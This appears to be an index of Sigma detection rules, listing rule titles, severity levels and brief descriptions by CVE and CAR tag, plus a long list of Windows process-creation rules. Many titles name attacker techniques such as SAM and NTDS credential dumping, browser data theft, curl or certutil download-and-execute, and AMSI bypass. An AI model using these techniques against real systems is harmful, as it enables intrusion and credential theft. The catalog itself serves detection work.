    Description: Detects any creation or modification to a windows domain group with the name "ESX Admins". This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
cve.2021.3156 2
Show Rules (2)
  • CVE-2021-3156 Exploitation Attempt - Level: high
    Description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. Alternative approach might be to look for flooding of auditd logs due to bruteforcing required to trigger the heap-based buffer overflow.
  • CVE-2021-3156 Exploitation Attempt Bruteforcing - Level: high
    Description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. Alternative approach might be to look for flooding of auditd logs due to bruteforcing. required to trigger the heap-based buffer overflow.
car.2019_04_002 1
Show Rules (1)
  • Regsvr32 Anomaly - Level: high
    Description: Detects various anomalies in relation to regsvr32.exe
car.2019_04_003 1
Show Rules (1)
  • Regsvr32 Anomaly - Level: high
    Description: Detects various anomalies in relation to regsvr32.exe
cve.2017_5638 1
Show Rules (1)
  • Potential OGNL Injection Exploitation In JVM Based Application - Level: high
    Description: Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the reason for some high profile RCE's such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)
cve.2021_1678 1
Show Rules (1)
  • Possible PrintNightmare Print Driver Install - Level: medium
    Description: Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.
car.2016_04_005 1
Show Rules (1)
  • Admin User Remote Logon - Level: low
    Description: Detect remote login by Administrator user (depending on internal pattern).
stp.4u 1
Show Rules (1)
  • Potential Access Token Abuse - Level: medium
    Description: Detects potential token impersonation and theft. Example, when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS flag".
cve.2021_21551 1
Show Rules (1)
  • PUA - Process Hacker Driver Load - Level: high
    Description: Detects driver load of the Process Hacker tool
cve.2021_36934 1
Show Rules (1)
  • HackTool - Typical HiveNightmare SAM File Export - Level: high
    Description: Detects files written by the different tools that exploit HiveNightmare
stp.1k 1
Show Rules (1)
  • CobaltStrike Named Pipe Patterns - Level: high
    Description: Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles
stp.2a 1
Show Rules (1)
  • Service Registry Permissions Weakness Check - Level: medium
    Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
cve.2023_21746 1
Show Rules (1)
  • HackTool - LocalPotato Execution - Level: high
    Description: Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples
car.2013_02_003 1
Show Rules (1)
  • Suspicious MSHTA Child Process - Level: high
    Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
car.2013_03_001 1
Show Rules (1)
  • Suspicious MSHTA Child Process - Level: high
    Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
car.2014_04_003 1
Show Rules (1)
  • Suspicious MSHTA Child Process - Level: high
    Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
cve.2020_1599 1
Show Rules (1)
  • MSHTA Suspicious Execution 01 - Level: high
    Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
car.2013_01_002 1
Show Rules (1)
  • Potential Persistence Via GlobalFlags - Level: high
    Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
cve.2014_6287 1
Show Rules (1)
  • Rejetto HTTP File Server RCE - Level: high
    Description: Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287
cve.2010_5278 1
Show Rules (1)
  • CVE-2010-5278 Exploitation Attempt - Level: critical
    Description: MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
cve.2015_1641 1
Show Rules (1)
  • Exploit for CVE-2015-1641 - Level: critical
    Description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
cve.2017_0261 1
Show Rules (1)
  • Exploit for CVE-2017-0261 - Level: medium
    Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
cve.2017_11882 1
Show Rules (1)
  • Droppers Exploiting CVE-2017-11882 - Level: critical
    Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
cve.2017_8759 1
Show Rules (1)
  • Exploit for CVE-2017-8759 - Level: critical
    Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
cve.2018_13379 1
Show Rules (1)
  • Fortinet CVE-2018-13379 Exploitation - Level: critical
    Description: Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
cve.2018_2894 1
Show Rules (1)
  • Oracle WebLogic Exploit - Level: critical
    Description: Detects access to a webshell dropped into a keystore folder on the WebLogic server
car.2013_10_002 1
Show Rules (1)
  • Sofacy Trojan Loader Activity - Level: high
    Description: Detects Trojan loader activity as used by APT28
cve.2019_11510 1
Show Rules (1)
  • Pulse Secure Attack CVE-2019-11510 - Level: critical
    Description: Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole
cve.2019_1378 1
Show Rules (1)
  • Exploiting SetupComplete.cmd CVE-2019-1378 - Level: high
    Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
cve.2019_19781 1
Show Rules (1)
  • Citrix Netscaler Attack CVE-2019-19781 - Level: critical
    Description: Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack
cve.2019_1388 1
Show Rules (1)
  • Exploiting CVE-2019-1388 - Level: critical
    Description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
cve.2019_3398 1
Show Rules (1)
  • Confluence Exploitation CVE-2019-3398 - Level: critical
    Description: Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398
cve.2020_10148 1
Show Rules (1)
  • CVE-2020-10148 SolarWinds Orion API Auth Bypass - Level: critical
    Description: Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts
cve.2020_1350 1
Show Rules (1)
  • DNS RCE CVE-2020-1350 - Level: critical
    Description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
cve.2020_5902 1
Show Rules (1)
  • CVE-2020-5902 F5 BIG-IP Exploitation Attempt - Level: critical
    Description: Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902
cve.2020_8193 1
Show Rules (1)
  • Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195 - Level: critical
    Description: Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195
cve.2020_8195 1
Show Rules (1)
  • Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195 - Level: critical
    Description: Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195
cve.2020_10189 1
Show Rules (1)
  • Exploited CVE-2020-10189 Zoho ManageEngine - Level: high
    Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
cve.2020_28188 1
Show Rules (1)
  • TerraMaster TOS CVE-2020-28188 - Level: high
    Description: Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188
cve.2020_3452 1
Show Rules (1)
  • Cisco ASA FTD Exploit CVE-2020-3452 - Level: high
    Description: Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)
cve.2020_14882 1
Show Rules (1)
  • Oracle WebLogic Exploit CVE-2020-14882 - Level: high
    Description: Detects exploitation attempts on WebLogic servers
cve.2021_20090 1
Show Rules (1)
  • Arcadyan Router Exploitations - Level: critical
    Description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.
cve.2021_20091 1
Show Rules (1)
  • Arcadyan Router Exploitations - Level: critical
    Description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.
cve.2021_2109 1
Show Rules (1)
  • Oracle WebLogic Exploit CVE-2021-2109 - Level: critical
    Description: Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
cve.2021_21972 1
Show Rules (1)
  • CVE-2021-21972 VSphere Exploitation - Level: high
    Description: Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972
cve.2021_22005 1
Show Rules (1)
  • VMware vCenter Server File Upload CVE-2021-22005 - Level: high
    Description: Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.
cve.2021_22123 1
Show Rules (1)
  • Fortinet CVE-2021-22123 Exploitation - Level: critical
    Description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs
cve.2021_22893 1
Show Rules (1)
  • Pulse Connect Secure RCE Attack CVE-2021-22893 - Level: high
    Description: This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)
cve.2021_26814 1
Show Rules (1)
  • Exploitation of CVE-2021-26814 in Wazuh - Level: high
    Description: Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814
cve.2021_26857 1
Show Rules (1)
  • Potential CVE-2021-26857 Exploitation Attempt - Level: high
    Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service
cve.2021_27905 1
Show Rules (1)
  • Potential CVE-2021-27905 Exploitation Attempt - Level: medium
    Description: Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1.
cve.2021_28480 1
Show Rules (1)
  • Exchange Exploitation CVE-2021-28480 - Level: critical
    Description: Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480
cve.2021_33766 1
Show Rules (1)
  • CVE-2021-33766 Exchange ProxyToken Exploitation - Level: critical
    Description: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766
cve.2021_41379 1
Show Rules (1)
  • Potential CVE-2021-41379 Exploitation Attempt - Level: critical
    Description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
cve.2021_41773 1
Show Rules (1)
  • CVE-2021-41773 Exploitation Attempt - Level: high
    Description: Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
cve.2021_42237 1
Show Rules (1)
  • Sitecore Pre-Auth RCE CVE-2021-42237 - Level: high
    Description: Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx
cve.2021_43798 1
Show Rules (1)
  • Grafana Path Traversal Exploitation CVE-2021-43798 - Level: critical
    Description: Detects a successful Grafana path traversal exploitation
cve.2021_44077 1
Show Rules (1)
  • CVE-2021-44077 POC Default Dropped File - Level: high
    Description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)
cve.2023_21554 1
Show Rules (1)
  • Potential CVE-2023-21554 QueueJumper Exploitation - Level: high
    Description: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)
cve.2022_21587 1
Show Rules (1)
  • Potential CVE-2022-21587 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution.
cve.2022_22954 1
Show Rules (1)
  • Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution - Level: medium
    Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
cve.2022_24527 1
Show Rules (1)
  • CVE-2022-24527 Microsoft Connected Cache LPE - Level: high
    Description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
cve.2022_26809 1
Show Rules (1)
  • Potential CVE-2022-26809 Exploitation Attempt - Level: high
    Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
cve.2022_27925 1
Show Rules (1)
  • Zimbra Collaboration Suite Email Server Unauthenticated RCE - Level: medium
    Description: Detects an attempt to leverage the vulnerable servlet "mboximport" for an unauthenticated remote command injection
cve.2022_29072 1
Show Rules (1)
  • Potential CVE-2022-29072 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.
cve.2022_31659 1
Show Rules (1)
  • CVE-2022-31659 VMware Workspace ONE Access RCE - Level: medium
    Description: Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659
cve.2022_31656 1
Show Rules (1)
  • CVE-2022-31656 VMware Workspace ONE Access Auth Bypass - Level: high
    Description: Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656 VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
cve.2022_36804 1
Show Rules (1)
  • Atlassian Bitbucket Command Injection Via Archive API - Level: high
    Description: Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804
cve.2022_42475 1
Show Rules (1)
  • Exploitation Indicator Of CVE-2022-42475 - Level: high
    Description: Detects exploitation indicators of CVE-2022-42475 a heap-based buffer overflow in sslvpnd.
cve.2022_44877 1
Show Rules (1)
  • Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877 - Level: high
    Description: Detects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877
cve.2022_46169 1
Show Rules (1)
  • Potential CVE-2022-46169 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169
cve.2023_1389 1
Show Rules (1)
  • CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21 - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-1389 an Unauthenticated Command Injection in TP-Link Archer AX21.
cve.2023_2283 1
Show Rules (1)
  • Potential CVE-2023-2283 Exploitation - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-2283 an authentication bypass in libSSH. The exploitation method causes an error message stating that keys for curve25519 could not be generated. It is an error message that is a sign of an exploitation attempt. It is not a sign of a successful exploitation.
cve.2023_23752 1
Show Rules (1)
  • Potential CVE-2023-23752 Exploitation Attempt - Level: high
    Description: Detects the potential exploitation attempt of CVE-2023-23752 an Improper access check, in web service endpoints in Joomla
cve.2023_25157 1
Show Rules (1)
  • Potential CVE-2023-25157 Exploitation Attempt - Level: high
    Description: Detects a potential exploitation attempt of CVE-2023-25157 a SQL injection in GeoServer
cve.2023_25717 1
Show Rules (1)
  • Potential CVE-2023-25717 Exploitation Attempt - Level: high
    Description: Detects a potential exploitation attempt of CVE-2023-25717 a Remote Code Execution via an unauthenticated HTTP GET Request, in Ruckus Wireless Admin
cve.2023_27363 1
Show Rules (1)
  • Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader - Level: high
    Description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation.
cve.2023_27997 1
Show Rules (1)
  • Potential CVE-2023-27997 Exploitation Indicators - Level: medium
    Description: Detects indicators of potential exploitation of CVE-2023-27997 in Frotigate weblogs. To avoid false positives it is best to look for successive requests to the endpoints mentioned as well as weird values of the "enc" parameter
cve.2024_1212 1
Show Rules (1)
  • CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection - Level: high
    Description: Detects potential exploitation of CVE-2024-1709 an unauthenticated command injection in Progress Kemp LoadMaster. It looks for GET requests to '/access/set' API with the parameters 'param=enableapi' and 'value=1' as well as an "Authorization" header with a base64 encoded value with an uncommon character.
cve.2024_3094 1
Show Rules (1)
  • Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process - Level: high
    Description: Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.
cve.2024_49113 1
Show Rules (1)
  • CVE-2024-49113 Exploitation Attempt - LDAP Nightmare - Level: high
    Description: Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll".
car.2016_04_004 1
Show Rules (1)
  • Potential Pass the Hash Activity - Level: medium
    Description: Detects the attack technique pass the hash which is used to move laterally inside the network
car.2013_04_002 1
Show Rules (1)
  • Quick Execution of a Series of Suspicious Commands - Level: low
    Description: Detects multiple suspicious process in a limited timeframe

Top Log Source Categories

Log Source CategoryCount1Rule TitleCount Bar
windows-process_creation 1387
Show Rules (1387)
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction
  • APT29
  • CrackMapExecWin
  • GALLIUM Artefacts
  • Suspicious Certutil Command Usage
  • Hurricane Panda Activity
  • Lazarus Activity Apr21
  • Lazarus Loaders
  • DNS Tunnel Technique from MuddyWater
  • TA505 Dropper Load Pattern
  • Read and Execute a File Via Cmd.exe
  • Cmd Stream Redirection
  • Credential Acquisition via Registry Hive Dumping
  • Visual Basic Script Execution
  • Execution via MSSQL Xp_cmdshell Stored Procedure
  • Indirect Command Exectuion via Forfiles
  • Indirect Command Execution
  • Invoke-Obfuscation RUNDLL LAUNCHER
  • Invoke-Obfuscation Via Use Rundll32
  • New Lolbin Process by Office Applications
  • Monitoring Wuauclt.exe For Lolbas Execution Of DLL
  • Abusing Findstr for Defense Evasion
  • Suspicious File Download Using Office Application
  • Execute MSDT.EXE Using Diagcab File
  • Ryuk Ransomware Command Line Activity
  • MavInject Process Injection
  • Process Memory Dumped Via RdrLeakDiag.EXE
  • Trickbot Malware Reconnaissance Activity
  • New Service Creation
  • Nslookup PwSh Download Cradle
  • Application Whitelisting Bypass via DLL Loaded by odbcconf.exe
  • Excel Proxy Executing Regsvr32 With Payload
  • Excel Proxy Executing Regsvr32 With Payload Alternate
  • Office Applications Spawning Wmi Cli Alternate
  • Possible Applocker Bypass
  • PowerShell AMSI Bypass Pattern
  • Base64 Encoded Listing of Shadowcopy
  • Malicious Base64 Encoded Powershell Invoke Cmdlets
  • Potential PowerShell Base64 Encoded Shellcode
  • Suspicious Bitsadmin Job via PowerShell
  • Stop Or Remove Antivirus Service
  • Potential Xor Encoded PowerShell Command
  • Regsvr32 Anomaly
  • Registry Dump of SAM Creds and Secrets
  • Renamed PaExec Execution
  • Renamed PsExec
  • Renamed PowerShell
  • Renamed Rundll32.exe Execution
  • Root Certificate Installed
  • Rundll32 JS RunHTMLApplication Pattern
  • Suspicious Rundll32 Script in CommandLine
  • Run from a Zip File
  • Suspicious Add Scheduled Task From User AppData Temp
  • Suspicious Execution of Sc to Delete AV Services
  • Stop Windows Service
  • Suspicious Bitstransfer via PowerShell
  • Suspicious Cmd Execution via WMI
  • Suspicious Characters in CommandLine
  • Wscript Execution from Non C Drive
  • Process Start From Suspicious Folder
  • Squirrel Lolbin
  • PsExec Tool Execution
  • PsExec Service Start
  • Run Whoami as SYSTEM
  • Winword.exe Loads Suspicious DLL
  • WMI Execution Via Office Process
  • WMI Remote Command Execution
  • WMI Reconnaissance List Remote Services
  • Windows Update Client LOLBIN
  • RClone Execution
  • Domain Trust Discovery
  • Suspicious Esentutl Use
  • Rclone Execution via Command Line or PowerShell
  • Activity Related to NTDS.dit Domain Hash Retrieval
  • Compress Data and Lock With Password for Exfiltration With 7-ZIP
  • 7Zip Compressing Dump Files
  • Potential DLL Injection Via AccCheckConsole
  • Suspicious AddinUtil.EXE CommandLine Execution
  • Uncommon Child Process Of AddinUtil.EXE
  • Uncommon AddinUtil.EXE CommandLine Execution
  • AddinUtil.EXE Execution From Uncommon Directory
  • Potential Adplus.EXE Abuse
  • AgentExecutor PowerShell Execution
  • Suspicious AgentExecutor PowerShell Execution
  • Uncommon Child Process Of Appvlp.EXE
  • AspNetCompiler Execution
  • Suspicious Child Process of AspNetCompiler
  • Potentially Suspicious ASP.NET Compilation Via AspNetCompiler
  • Uncommon Assistive Technology Applications Execution Via AtBroker.EXE
  • Hiding Files with Attrib.exe
  • Set Suspicious Files as System Files Using Attrib.EXE
  • Interactive AT Job
  • Audit Policy Tampering Via NT Resource Kit Auditpol
  • Audit Policy Tampering Via Auditpol
  • Indirect Inline Command Execution Via Bash.EXE
  • Indirect Command Execution From Script File Via Bash.EXE
  • Boot Configuration Tampering Via Bcdedit.EXE
  • Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE
  • Data Export From MSSQL Table Via BCP.EXE
  • Suspicious Child Process Of BgInfo.EXE
  • BitLockerTogo.EXE Execution
  • Uncommon Child Process Of BgInfo.EXE
  • Suspicious Download From Direct IP Via Bitsadmin
  • File Download Via Bitsadmin
  • Suspicious Download From File-Sharing Website Via Bitsadmin
  • File With Suspicious Extension Downloaded Via Bitsadmin
  • File Download Via Bitsadmin To A Suspicious Target Folder
  • File Download Via Bitsadmin To An Uncommon Target Folder
  • Monitoring For Persistence Via BITS
  • Potential Data Stealing Via Chromium Headless Debugging
  • Browser Execution In Headless Mode
  • File Download with Headless Browser
  • Chromium Browser Instance Executed With Custom Extension
  • Chromium Browser Headless Execution To Mockbin Like Site
  • Suspicious Chromium Browser Instance Executed With Custom Extension
  • File Download From Browser Process Via Inline URL
  • Browser Started with Remote Debugging
  • Tor Client/Browser Execution
  • Suspicious Calculator Usage
  • Potential Binary Proxy Execution Via Cdb.EXE
  • New Root Certificate Installed Via CertMgr.EXE
  • File Download via CertOC.EXE
  • File Download From IP Based URL Via CertOC.EXE
  • DLL Loaded via CertOC.EXE
  • Suspicious DLL Loaded via CertOC.EXE
  • New Root Certificate Installed Via Certutil.EXE
  • File Decoded From Base64/Hex Via Certutil.EXE
  • Suspicious Download Via Certutil.EXE
  • Suspicious File Downloaded From Direct IP Via Certutil.EXE
  • Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
  • File Encoded To Base64 Via Certutil.EXE
  • Potential NTLM Coercion Via Certutil.EXE
  • Suspicious File Encoded To Base64 Via Certutil.EXE
  • File In Suspicious Location Encoded To Base64 Via Certutil.EXE
  • Certificate Exported Via Certutil.EXE
  • Suspicious CodePage Switch Via CHCP
  • Console CodePage Lookup Via CHCP
  • Deleted Data Overwritten Via Cipher.EXE
  • Process Access via TrolleyExpress Exclusion
  • Data Copied To Clipboard Via Clip.EXE
  • Cloudflared Portable Execution
  • Cloudflared Quick Tunnel Execution
  • Cloudflared Tunnel Connections Cleanup
  • Cloudflared Tunnel Execution
  • New Generic Credentials Added Via Cmdkey.EXE
  • Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
  • Change Default File Association Via Assoc
  • Potential Arbitrary File Download Via Cmdl32.EXE
  • Change Default File Association To Executable Via Assoc
  • Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE
  • Curl Download And Execute Combination
  • File Deletion Via Del
  • Greedy File Deletion Using Del
  • File And SubFolder Enumeration Via Dir Command
  • Potential Dosfuscation Activity
  • Command Line Execution with Suspicious URL and AppData Strings
  • Potential Privilege Escalation Using Symlink Between Osk and Cmd
  • VolumeShadowCopy Symlink Creation Via Mklink
  • Suspicious File Execution From Internet Hosted WebDav Share
  • Cmd.EXE Missing Space Characters Execution Anomaly
  • Potential CommandLine Path Traversal Via Cmd.EXE
  • NtdllPipe Like Activity Execution
  • Potentially Suspicious Ping/Copy Command Combination
  • Suspicious Ping/Del Command Combination
  • Potentially Suspicious CMD Shell Output Redirect
  • Directory Removal Via Rmdir
  • Copy From VolumeShadowCopy Via Cmd.EXE
  • Read Contents From Stdin Via Cmd.EXE
  • Persistence Via Sticky Key Backdoor
  • Sticky Key Like Backdoor Execution
  • Potential Download/Upload Activity Using Type Command
  • Unusual Parent Process For Cmd.EXE
  • CMSTP Execution Process Creation
  • Arbitrary File Download Via ConfigSecurityPolicy.EXE
  • Powershell Executed From Headless ConHost Process
  • Suspicious High IntegrityLevel Conhost Legacy Option
  • Conhost.exe CommandLine Path Traversal
  • Uncommon Child Process Of Conhost.EXE
  • Conhost Spawned By Uncommon Parent Process
  • Control Panel Items
  • CreateDump Process Dump
  • Dynamic .NET Compilation Via Csc.EXE
  • Csc.EXE Execution Form Potentially Suspicious Parent
  • Suspicious Csi.exe Usage
  • Suspicious Use of CSharp Interactive Console
  • Active Directory Structure Export Via Csvde.EXE
  • Potential Cookies Session Hijacking
  • Curl Web Request With Potential Custom User-Agent
  • File Download From IP URL Via Curl.EXE
  • Suspicious File Download From IP Via Curl.EXE
  • Suspicious File Download From File Sharing Domain Via Curl.EXE
  • Insecure Transfer Via Curl.EXE
  • Insecure Proxy/DOH Transfer Via Curl.EXE
  • Suspicious Curl.EXE Download
  • Local File Read Using Curl.EXE
  • ManageEngine Endpoint Central Dctask64.EXE Potential Abuse
  • Uncommon Child Process Of Defaultpack.EXE
  • Remote File Download Via Desktopimgdownldr Utility
  • Suspicious Desktopimgdownldr Command
  • Potential DLL Sideloading Via DeviceEnroller.EXE
  • Potentially Suspicious Child Process Of ClickOnce Application
  • Arbitrary MSI Download Via Devinit.EXE
  • DirLister Execution
  • PowerShell Web Access Feature Enabled Via DISM
  • Potentially Suspicious Child Process Of DiskShadow.EXE
  • Diskshadow Script Mode - Uncommon Script Extension Execution
  • Diskshadow Script Mode - Execution From Potential Suspicious Location
  • Dism Remove Online Package
  • Dllhost.EXE Execution Anomaly
  • DLL Sideloading by VMware Xfer Utility
  • Potential Discovery Activity Via Dnscmd.EXE
  • New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE
  • DNS Exfiltration and Tunneling Tools Execution
  • Unusual Child Process of dns.exe
  • Potential Application Whitelisting Bypass via Dnx.EXE
  • Process Memory Dump Via Dotnet-Dump
  • Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE
  • Binary Proxy Execution Via Dotnet-Trace.EXE
  • Potential Recon Activity Using DriverQuery.EXE
  • DriverQuery.EXE Execution
  • Potentially Over Permissive Permissions Granted Using Dsacls.EXE
  • Potential Password Spraying Attempt Using Dsacls.EXE
  • Domain Trust Discovery Via Dsquery
  • Suspicious Kernel Dump Using Dtrace
  • Potential Windows Defender AV Bypass Via Dump64.EXE Rename
  • DumpMinitool Execution
  • Suspicious DumpMinitool Execution
  • New Capture Session Launched Via DXCap.EXE
  • Esentutl Gather Credentials
  • Copying Sensitive Files with Credential Data
  • Esentutl Steals Browser Information
  • Potentially Suspicious Event Viewer Child Process
  • Potentially Suspicious Cabinet File Expansion
  • Explorer Process Tree Break
  • File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell
  • Explorer NOUACCHECK Flag
  • Remote File Download Via Findstr.EXE
  • Findstr GPP Passwords
  • Findstr Launching .lnk File
  • LSASS Process Reconnaissance Via Findstr.EXE
  • Recon Command Output Piped To Findstr.EXE
  • Permission Misconfiguration Reconnaissance Via Findstr.EXE
  • Security Tools Keyword Lookup Via Findstr.EXE
  • Insensitive Subfolder Search Via Findstr.EXE
  • Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE
  • Finger.EXE Execution
  • Filter Driver Unloaded Via Fltmc.EXE
  • Sysmon Driver Unloaded Via Fltmc.EXE
  • Forfiles.EXE Child Process Masquerading
  • Forfiles Command Execution
  • Uncommon FileSystem Load Attempt By Format.com
  • Use of FSharp Interpreters
  • Fsutil Drive Enumeration
  • Fsutil Behavior Set SymlinkEvaluation
  • Fsutil Suspicious Invocation
  • Potential Arbitrary Command Execution Via FTP.EXE
  • Arbitrary File Download Via GfxDownloadWrapper.EXE
  • Suspicious Git Clone
  • Potentially Suspicious GoogleUpdate Child Process
  • File Decryption Using Gpg4win
  • File Encryption Using Gpg4win
  • Portable Gpg.EXE Execution
  • File Encryption/Decryption Via Gpg4win From Suspicious Locations
  • Arbitrary Binary Execution Using GUP Utility
  • Gpresult Display Group Policy Information
  • File Download Using Notepad++ GUP Utility
  • Suspicious GUP Usage
  • HH.EXE Execution
  • Remote CHM File Download/Execution Via HH.EXE
  • HTML Help HH.EXE Suspicious Child Process
  • Suspicious HH.EXE Execution
  • HackTool - ADCSPwn Execution
  • HackTool - Bloodhound/Sharphound Execution
  • HackTool - F-Secure C3 Load by Rundll32
  • HackTool - Certify Execution
  • HackTool - Certipy Execution
  • Operator Bloopers Cobalt Strike Commands
